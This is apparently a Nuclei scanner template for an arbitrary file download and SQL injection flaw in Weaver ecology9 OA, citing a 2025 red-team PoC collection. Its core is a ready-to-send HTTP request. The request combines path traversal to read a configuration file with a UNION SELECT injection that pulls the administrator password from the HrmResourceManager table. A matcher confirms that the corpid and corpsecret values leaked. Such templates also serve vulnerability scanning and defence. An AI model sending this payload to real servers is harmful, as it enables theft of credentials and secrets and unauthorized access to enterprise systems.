id: weaver-ecology-v9-FileDownloadLocation-filedownload
info:
  name: 泛微ecology9FileDownloadLocation任意文件下载漏洞
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/crushforyou/2025hvv-poc/blob/main/%E6%B3%9B%E5%BE%AE/%E6%B3%9B%E5%BE%AEecology9FileDownloadLocation%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.txt
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    version:
  tags: weaver,sqli,filedownload,oa,ecology

http:
  - raw:
      - |
        GET /weaver/weaver.email.FileDownloadLocation/login/LoginSSOxjsp/x.FileDownloadLocation?ddcode=7ea7ef3c41d67297&downfiletype=eml&download=1&mailId=1123+union+select+*+from+(select+1+as+resourceid,'../ecology/WEB-INF/prop/mobilemode.properties'+as+x2,'3'+as+x3,(select++*+from+(select+*+from+(select+password+from+HrmResourceManager+where+id=1)x)x)+as+x4,5+as+x5,6+as+x6)x+where+1=1&mailid=action.WorkflowFnaEffectNew&parentid=0 HTTP/1.1
        Host: {{Hostname}}
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'corpid','corpsecret')
        condition: and